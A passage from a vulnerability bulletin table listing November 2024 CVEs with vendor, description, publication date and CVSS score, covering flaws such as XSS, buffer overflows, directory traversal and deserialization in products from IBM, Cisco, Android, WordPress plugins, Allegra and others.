IBM Watson Query on Cloud Pak for Data 1.8, 2.0, 2.1, 2.2 and IBM Db2 Big SQL on Cloud Pak for Data 7.3, 7.4, 7.5, and 7.6 could allow an authenticated user to obtain sensitive information due to insufficient session expiration. | 2024-11-23 | 4.3 | CVE-2024-35160 |
| n/a -- n/a |
IBM Concert Software 1.0.0, 1.0.1, 1.0.2, and 1.0.2.1 could allow an authenticated user to obtain sensitive information that could aid in further attacks against the system. | 2024-11-19 | 4.3 | CVE-2024-37070 |
| n/a -- n/a |
The WPDash Notes plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wp_ajax_post_it_list_comment' function in all versions up to, and including, 1.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view comments on any post, including private and password protected posts, and pending and draft posts if they were previously published. The vulnerability was partially patched in version 1.3.5. | 2024-11-23 | 4.3 | CVE-2024-9223 |
| n/a -- n/a |
The Lock User Account plugin for WordPress is vulnerable to user lock bypass in all versions up to, and including, 1.0.5. This is due to permitting application password logins when user accounts are locked. This makes it possible for authenticated attackers, with existing application passwords, to interact with the vulnerable site via an API such as XML-RPC or REST despite their account being locked. | 2024-11-21 | 4.2 | CVE-2024-11197 |
| pluginus -- woocommerce_products_filter |
The HUSKY - Products Filter Professional for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the really_curr_tax parameter in all versions up to, and including, 1.3.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-11-19 | 6.1 | CVE-2024-11400 |
| smarttek -- smart_doctor |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Smarttek Informatics Smart Doctor allows Stored XSS.This issue affects Smart Doctor: through 21.11.2024. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-11-21 | 5.4 | CVE-2024-7016 |
| sureshkumar -- wp-login_customizer |
Cross-Site Request Forgery (CSRF) vulnerability in Suresh Kumar wp-login customizer allows Stored XSS.This issue affects wp-login customizer: from n/a through 1.0. | 2024-11-18 | 6.1 | CVE-2024-52424 |
| terryl -- wp_githuber_md |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Terry Lin WP Githuber MD allows Stored XSS.This issue affects WP Githuber MD: from n/a through 1.16.3. | 2024-11-18 | 5.4 | CVE-2024-52422 |
| themify -- builder |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Themify Themify Builder allows Stored XSS.This issue affects Themify Builder: from n/a through 7.6.3. | 2024-11-18 | 5.4 | CVE-2024-52423 |
| trcore -- dvc |
The DVC from TRCore encrypts files using a hardcoded key. Attackers can use this key to decrypt the files and restore the original content. | 2024-11-18 | 5.5 | CVE-2024-11308 |
| urchenko -- drozd |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Urchenko Drozd - Addons for Elementor allows Stored XSS.This issue affects Drozd - Addons for Elementor: from n/a through 1.1.1. | 2024-11-18 | 5.4 | CVE-2024-52425 |
| w3speedster -- w3speedster |
Cross-Site Request Forgery (CSRF) vulnerability in W3speedster W3SPEEDSTER.This issue affects W3SPEEDSTER: from n/a through 7.25. | 2024-11-19 | 6.5 | CVE-2024-52392 |
| wowdevs -- sky_addons_for_elementor |
The Sky Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.1 via the render function in modules/content-switcher/widgets/content-switcher.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data. | 2024-11-21 | 4.3 | CVE-2024-9542 |
| wpzoom -- beaver_builder_addons |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in WPZOOM Beaver Builder Addons by WPZOOM allows Stored XSS.This issue affects Beaver Builder Addons by WPZOOM: from n/a through 1.3.4. | 2024-11-19 | 5.4 | CVE-2024-30424 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24465. | 2024-11-22 | 3.3 | CVE-2024-9749 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info |
|---|---|---|---|---|
| n/a -- n/a |
miniupnp before 4c90b87, as used in Bitcoin Core before 0.12 and other products, lacks checks for snprintf return values, leading to a buffer overflow and significant data leak, a different vulnerability than CVE-2019-12107. In Bitcoin Core before 0.12, remote code execution was possible in conjunction with CVE-2015-6031 exploitation. | 2024-11-18 | not yet calculated | CVE-2015-20111 |
| n/a -- n/a |
In writeToParcel and createFromParcel of DcParamObject.java, there is a permission bypass due to a write size mismatch. This could lead to an elevation of privileges where the user can start an activity with system privileges, with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | not yet calculated | CVE-2017-13315 |
| n/a -- n/a |
In smp_data_received of smp_l2c.cc, there is a possible out of bounds read followed by code execution due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-19 | not yet calculated | CVE-2018-9365 |
| n/a -- n/a |
In cmd_flash_mmc_sparse_img of dl_commands.c, there is a possible out of bounds write due to a missing bounds check. This could lead to a local escalation of privilege in the bootloader with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | not yet calculated | CVE-2018-9372 |
| n/a -- n/a |
In HWCSession::SetColorModeById of hwc_session.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | not yet calculated | CVE-2018-9409 |
| n/a -- n/a |
In query of DownloadManager.java, there is a possible read/write of arbitrary files due to a permissions bypass. This could lead to local information disclosure and file rewriting with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9468 |
| n/a -- n/a |
In multiple functions of ShortcutService.java, there is a possible creation of a spoofed shortcut due to a missing permission check. This could lead to local escalation of privilege in a privileged app with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9469 |
| n/a -- n/a |
In bff_Scanner_addOutPos of Scanner.c, there is a possible out-of-bounds write due to an incorrect bounds check. This could lead to remote escalation of privilege in an unprivileged app with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9470 |
| n/a -- n/a |
In the deserialization constructor of NanoAppFilter.java, there is a possible loss of data due to type confusion. This could lead to local escalation of privilege in the system server with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9471 |
| n/a -- n/a |
In xmlMemStrdupLoc of xmlmemory.c, there is a possible out-of-bounds write due to an integer overflow. This could lead to remote code execution in an unprivileged process with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9472 |
| n/a -- n/a |
In writeToParcel of MediaPlayer.java, there is a possible serialization/deserialization mismatch due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9474 |
| n/a -- n/a |
In HeadsetInterface::ClccResponse of btif_hf.cc, there is a possible out of bounds stack write due to a missing bounds check. This could lead to remote escalation of privilege via Bluetooth, if the recipient has enabled SIP calls with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9475 |
| n/a -- n/a |
In the development options section of the Settings app, there is a possible authentication bypass due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9477 |
| n/a -- n/a |
In process_service_attr_req and process_service_search_attr_req of sdp_server.cc, there is an out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9478 |
| n/a -- n/a |
In process_service_attr_req and process_service_search_attr_req of sdp_server.cc, there is an out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9479 |
| n/a -- n/a |
In bta_hd_get_report_act of bta_hd_act.cc, there is a possible out-of-bounds read due to improper input validation. This could lead to remote information disclosure in the Bluetooth service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9480 |
| n/a -- n/a |
In bta_hd_set_report_act of bta_hd_act.cc, there is a possible out-of-bounds read due to an integer overflow. This could lead to remote information disclosure in the Bluetooth service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9481 |
| n/a -- n/a |
In intr_data_copy_cb of btif_hd.cc, there is a possible out of bounds read due to an integer overflow. This could lead to local information disclosure in the Bluetooth service with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9482 |
| n/a -- n/a |
In bta_dm_remove_sec_dev_entry of bta_dm_act.cc, there is a possible out of bounds read due to a use after free. This could lead to remote information disclosure over bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9483 |
| n/a -- n/a |
In l2cu_send_peer_config_rej of l2c_utils.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9484 |
| n/a -- n/a |
In l2cble_process_sig_cmd of l2c_ble.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure over bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9485 |
| n/a -- n/a |
In hidh_l2cif_data_ind of hidh_conn.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure over bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9486 |
| n/a -- n/a |
In setVpnForcedLocked of Vpn.java, there is a possible blocking of internet traffic through vpn due to a bad uid check. This could lead to local denial of service with no additional execution privileges needed. User interaction is needed for exploitation. | 2024-11-20 | not yet calculated | CVE-2018-9487 |
| n/a -- n/a |
Bitcoin Core before 24.0.1 allows remote attackers to cause a denial of service (daemon crash) via a flood of low-difficulty header chains (aka a "Chain Width Expansion" attack) because a node does not first verify that a presented chain has enough work before committing to store it. | 2024-11-18 | not yet calculated | CVE-2019-25220 |
| n/a -- n/a |
A vulnerability in Cisco Integrated Management Controller could allow an unauthenticated, remote attacker to enumerate valid usernames within the vulnerable application. The vulnerability is due to differences in authentication responses sent back from the application as part of an authentication attempt. An attacker could exploit this vulnerability by sending authentication requests to the affected application. A successful exploit could allow the attacker to confirm the names of administrative user accounts for use in further attacks.There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2020-26062 |
| n/a -- n/a |
A vulnerability in the API endpoints of Cisco Integrated Management Controller could allow an authenticated, remote attacker to bypass authorization and take actions on a vulnerable system without authorization. The vulnerability is due to improper authorization checks on API endpoints. An attacker could exploit this vulnerability by sending malicious requests to an API endpoint. An exploit could allow the attacker to download files from or modify limited configuration options on the affected system.There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2020-26063 |
| n/a -- n/a |
A vulnerability in the web UI of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to gain read and write access to information that is stored on an affected system. The vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by persuading a user to import a crafted XML file with malicious entries. A successful exploit could allow the attacker to read and write files within the affected application.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2020-26066 |
| n/a -- n/a |
A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to gain access to sensitive information. The vulnerability is due to improper validation of directory traversal character sequences within requests to application programmatic interfaces (APIs). An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and gain access to sensitive information including credentials or user tokens.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2020-26073 |
| n/a -- n/a |
A vulnerability in system file transfer functions of Cisco SD-WAN vManage Software could allow an authenticated, local attacker to gain escalated privileges on the underlying operating system. The vulnerability is due to improper validation of path input to the system file transfer functions. An attacker could exploit this vulnerability by sending requests that contain specially crafted path variables to the vulnerable system. A successful exploit could allow the attacker to overwrite arbitrary files, allowing the attacker to modify the system in such a way that could allow the attacker to gain escalated privileges.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2020-26074 |
| n/a -- n/a |
A vulnerability in the SSL/TLS handler of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to cause the affected device to reload unexpectedly, leading to a denial of service (DoS) condition. The vulnerability is due to improper error handling on established SSL/TLS connections. An attacker could exploit this vulnerability by establishing an SSL/TLS connection with the affected device and then sending a malicious SSL/TLS message within that connection. A successful exploit could allow the attacker to cause the device to reload.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2020-27124 |
| n/a -- n/a |
A vulnerability in the web-based management interface of Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by inserting malicious data into a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information.There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2020-3420 |
| n/a -- n/a |
A vulnerability in the Admin portal of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to recover service account passwords that are saved on an affected system. The vulnerability is due to the incorrect inclusion of saved passwords when loading configuration pages in the Admin portal. An attacker with read or write access to the Admin portal could exploit this vulnerability by browsing to a page that contains sensitive data. A successful exploit could allow the attacker to recover passwords and expose those accounts to further attack.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2020-3525 |
| n/a -- n/a |
A vulnerability in the web-based management interface of Cisco Unified Communications Manager, Cisco Unified Communications Manager Session Management Edition, Cisco Unified Communications Manager IM & Presence Service, and Cisco Unity Connection could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive browser-based information.There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2020-3532 |
| n/a -- n/a |
A vulnerability in the Transport Layer Security (TLS) protocol implementation of Cisco AsyncOS software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to cause high CPU usage on an affected device, resulting in a denial of service (DoS) condition. The vulnerability is due to inefficient processing of incoming TLS traffic. An attacker could exploit this vulnerability by sending a series of crafted TLS packets to an affected device. A successful exploit could allow the attacker to trigger a prolonged state of high CPU utilization. The affected device would still be operative, but response time and overall performance may be degraded.There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2020-3548 |
| n/a -- n/a |
A vulnerability in the API subsystem and in the web-management interface of Cisco Network Services Orchestrator (NSO) could allow an unauthenticated, remote attacker to access sensitive data. This vulnerability exists because the web-management interface and certain HTTP-based APIs do not properly validate user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request that contains directory traversal character sequences to an affected system. A successful exploit could allow the attacker to access sensitive files on the affected system.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2021-1132 |
| n/a -- n/a |
A vulnerability in the cluster management interface of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to view sensitive information on an affected system. To be affected by this vulnerability, the vManage software must be in cluster mode. This vulnerability is due to the absence of authentication for sensitive information in the cluster management interface. An attacker could exploit this vulnerability by sending a crafted request to the cluster management interface of an affected system. A successful exploit could allow the attacker to view sensitive information on the affected system.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2021-1234 |
| n/a -- n/a |
Multiple Cisco products are affected by a vulnerability in the Ethernet Frame Decoder of the Snort detection engine that could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition. The vulnerability is due to improper handling of error conditions when processing Ethernet frames. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device. A successful exploit could allow the attacker to exhaust disk space on the affected device, which could result in administrators being unable to log in to the device or the device being unable to boot up correctly.Note: Manual intervention is required to recover from this situation. Customers are advised to contact the Cisco Technical Assistance Center (TAC) to help recover a device in this condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2021-1285 |
| n/a -- n/a |
A vulnerability in the ipsecmgr process of Cisco ASR 5000 Series Software (StarOS) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. This vulnerability is due to insufficient validation of incoming Internet Key Exchange Version 2 (IKEv2) packets. An attacker could exploit this vulnerability by sending specifically malformed IKEv2 packets to an affected device. A successful exploit could allow the attacker to cause the ipsecmgr process to restart, which would disrupt ongoing IKE negotiations and result in a temporary DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2021-1424 |
| n/a -- n/a |
A vulnerability in the implementation of the Resource Public Key Infrastructure (RPKI) feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to cause the Border Gateway Protocol (BGP) process to crash, resulting in a denial of service (DoS) condition. This vulnerability is due to the incorrect handling of a specific RPKI to Router (RTR) Protocol packet header. An attacker could exploit this vulnerability by compromising the RPKI validator server and sending a specifically crafted RTR packet to an affected device. Alternatively, the attacker could use man-in-the-middle techniques to impersonate the RPKI validator server and send a specifically crafted RTR response packet over the established RTR TCP connection to the affected device. A successful exploit could allow the attacker to cause a DoS condition because the BGP process could constantly restart and BGP routing could become unstable.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.This advisory is part of the September 2021 release of the Cisco IOS XR Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see . | 2024-11-18 | not yet calculated | CVE-2021-1440 |
| n/a -- n/a |
A vulnerability in the Image Signature Verification feature of Cisco SD-WAN Software could allow an authenticated, remote attacker with Administrator-level credentials to install a malicious software patch on an affected device. The vulnerability is due to improper verification of digital signatures for patch images. An attacker could exploit this vulnerability by crafting an unsigned software patch to bypass signature checks and loading it on an affected device. A successful exploit could allow the attacker to boot a malicious software patch image.Cisco has released software updates that address the vulnerability described in this advisory. There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2021-1461 |
| n/a -- n/a |
A vulnerability in the CLI of Cisco SD-WAN vManage Software could allow an authenticated, local attacker to elevate privileges on an affected system. To exploit this vulnerability, an attacker would need to have a valid Administrator account on an affected system. The vulnerability is due to incorrect privilege assignment. An attacker could exploit this vulnerability by logging in to an affected system with an Administrator account and creating a malicious file, which the system would parse at a later time. A successful exploit could allow the attacker to obtain root privileges on the affected system.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | not yet calculated | CVE-2021-1462 |
| n/a -- n/a |
A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct a directory traversal attack and obtain read access to sensitive files on an affected system. The vulnerability is due to insufficient validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request that contains directory traversal character sequences to an affected system. A successful exploit could allow the attacker to write arbitrary files on the affected system. | 2024-11-18 | not yet calculated | CVE-2021-1465 |
| n/a -- n/a |
Possible Elevation of Privilege Vulnerability in iManager has been discovered in OpenTextâ„¢ iManager. This impacts all versions before 3.2.5 | 2024-11-22 | not yet calculated | CVE-2021-38116 |
| n/a -- n/a |
Possible Command injection Vulnerability in iManager has been discovered in OpenText„ iManager 3.2.4.0000. | 2024-11-22 | not yet calculated | CVE-2021-38117 |
| n/a -- n/a |
Possible improper input validation Vulnerability in iManager has been discovered in OpenText„ iManager 3.2.4.0000. | 2024-11-22 | not yet calculated | CVE-2021-38118 |
| n/a -- n/a |
Possible Reflected Cross-Site Scripting (XSS) Vulnerability in iManager has been discovered in OpenText„ iManager 3.2.4.0000. | 2024-11-22 | not yet calculated | CVE-2021-38119 |
| n/a -- n/a |
Possible XSS in iManager URL for access Component has been discovered in OpenText„ iManager 3.2.5.0000. | 2024-11-22 | not yet calculated | CVE-2021-38134 |
| n/a -- n/a |
Possible External Service Interaction attack in iManager has been discovered in OpenText„ iManager 3.2.6.0000. | 2024-11-22 | not yet calculated | CVE-2021-38135 |
| n/a -- n/a |
Possible XSS in iManager URL for access Component has been discovered in OpenText„ iManager 3.2.6.0000. | 2024-11-22 | not yet calculated | CVE-2022-26324 |
| n/a -- n/a |
An information exposure through log file vulnerability exists in Brocade SANnav before Brocade SANnav 2.2.2, where configuration secrets are logged in supportsave. Supportsave file is generated by an admin user troubleshooting the switch. The Logged information may include usernames and passwords, and secret keys. | 2024-11-21 | not yet calculated | CVE-2022-43933 |
| n/a -- n/a |
Brocade SANnav before Brocade SANnav 2.2.2 supports key exchange algorithms, which are considered weak on ports 24, 6514, 18023, 19094, and 19095. | 2024-11-21 | not yet calculated | CVE-2022-43934 |
| n/a -- n/a |
An information exposure through log file vulnerability exists in Brocade SANnav before Brocade SANnav 2.2.2, where Brocade Fabric OS Switch passwords and authorization IDs are printed in the embedded MLS DB file. | 2024-11-21 | not yet calculated | CVE-2022-43935 |
| n/a -- n/a |
Brocade SANnav versions before 2.2.2 log Brocade Fabric OS switch passwords when debugging is enabled. | 2024-11-21 | not yet calculated | CVE-2022-43936 |
| n/a -- n/a |
Possible information exposure through log file vulnerability where sensitive fields are recorded in the debug-enabled logs when debugging is turned on in Brocade SANnav before 2.3.0 and 2.2.2a | 2024-11-21 | not yet calculated | CVE-2022-43937 |
| n/a -- n/a |
Cross-Site Request Forgery (CSRF) vulnerability in Repute InfoSystems ARMember, Repute InfoSystems ARMember Premium allows Cross-Site Request Forgery.This issue affects ARMember: from n/a through 4.0.5; ARMember Premium: from n/a before 6.7.1. | 2024-11-19 | not yet calculated | CVE-2022-47424 |
| n/a -- n/a |
In restorePermissionState of PermissionManagerServiceImpl.java, there is a possible way for an app to keep permissions that should be revoked due to incorrect permission flags cleared during an update. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. | 2024-11-19 | not yet calculated | CVE-2023-21270 |
| n/a -- n/a |
Possible XML External Entity Injection in iManager GET parameter has been discovered in OpenTextâ„¢ iManager 3.2.6.0200. | 2024-11-22 | not yet calculated | CVE-2023-24466 |
| n/a -- n/a |
Possible Command Injection in iManager GET parameter has been discovered in OpenTextâ„¢ iManager 3.2.6.0000. | 2024-11-22 | not yet calculated | CVE-2023-24467 |
| n/a -- n/a |
A flaw was found within the parsing of SMB2 requests that have a transform header in the kernel ksmbd module. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this to disclose sensitive information on affected installations of Linux. Only systems with ksmbd enabled are vulnerable to this CVE. | 2024-11-18 | not yet calculated | CVE-2023-39176 |
| n/a -- n/a |
A flaw was found within the handling of SMB2 read requests in the kernel ksmbd module. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this to disclose sensitive information on affected installations of Linux. Only systems with ksmbd enabled are vulnerable to this CVE. | 2024-11-18 | not yet calculated | CVE-2023-39179 |
| n/a -- n/a |
A flaw was found within the handling of SMB2_READ commands in the kernel ksmbd module. The issue results from not releasing memory after its effective lifetime. An attacker can leverage this to create a denial-of-service condition on affected installations of Linux. Authentication is not required to exploit this vulnerability, but only systems with ksmbd enabled are vulnerable. | 2024-11-18 | not yet calculated | CVE-2023-39180 |
| n/a -- n/a |
PaperCut NG print.script.sandboxed Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PaperCut NG. Authentication is required to exploit this vulnerability. The specific flaw exists within the management of the print.script.sandboxed setting. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-20965. | 2024-11-22 | not yet calculated | CVE-2023-39470 |
| n/a -- n/a |
Mastodon 4.1.x before 4.1.17 and 4.2.x before 4.2.9 allows a bypass of rate limiting via a crafted HTTP request header. | 2024-11-18 | not yet calculated | CVE-2023-49952 |
| n/a -- n/a |
NETGEAR RAX30 Improper Certificate Validation Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to compromise the integrity of downloaded information on affected installations of NETGEAR RAX30 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the downloading of files via HTTPS. The issue results from the lack of proper validation of the certificate presented by the server. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of root. Was ZDI-CAN-19589. | 2024-11-22 | not yet calculated | CVE-2023-51634 |
| n/a -- n/a |
NETGEAR RAX30 fing_dil Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR RAX30 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within fing_dil service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19843. | 2024-11-22 | not yet calculated | CVE-2023-51635 |
| n/a -- n/a |
Allegra Hard-coded Credentials Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the configuration of a database. The issue results from the use of a hardcoded password. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-22360. | 2024-11-22 | not yet calculated | CVE-2023-51638 |
| n/a -- n/a |
Allegra downloadExportedChart Directory Traversal Authentication Bypass Vulnerability. This vulnerability allows remote attackers to bypass authentication on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the downloadExportedChart action. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-22361. | 2024-11-22 | not yet calculated | CVE-2023-51639 |
| n/a -- n/a |
Allegra extarctZippedFile Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the extarctZippedFile [sic] method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-22504. | 2024-11-22 | not yet calculated | CVE-2023-51640 |
| n/a -- n/a |
Allegra renderFieldMatch Deserialization of Unstrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Although authentication is required to exploit this vulnerability, product implements a registration mechanism that can be used to create a user with a sufficient privilege level. The specific flaw exists within the renderFieldMatch method. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-22505. | 2024-11-22 | not yet calculated | CVE-2023-51641 |
| n/a -- n/a |
Allegra loadFieldMatch Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Although authentication is required to exploit this vulnerability, product implements a registration mechanism that can be used to create a user with a sufficient privilege level. The specific flaw exists within the loadFieldMatch method. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-22506. | 2024-11-22 | not yet calculated | CVE-2023-51642 |
| n/a -- n/a |
Allegra uploadFile Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the uploadFile method. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-22510. | 2024-11-22 | not yet calculated | CVE-2023-51643 |
| n/a -- n/a |
Allegra SiteConfigAction Improper Access Control Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Allegra. Authentication is not required to exploit this vulnerability. The specific flaw exists within the configuration of Struts. The issue results from improper access control. An attacker can leverage this vulnerability to execute code in the context of LOCAL SERVICE. Was ZDI-CAN-22512. | 2024-11-22 | not yet calculated | CVE-2023-51644 |
| n/a -- n/a |
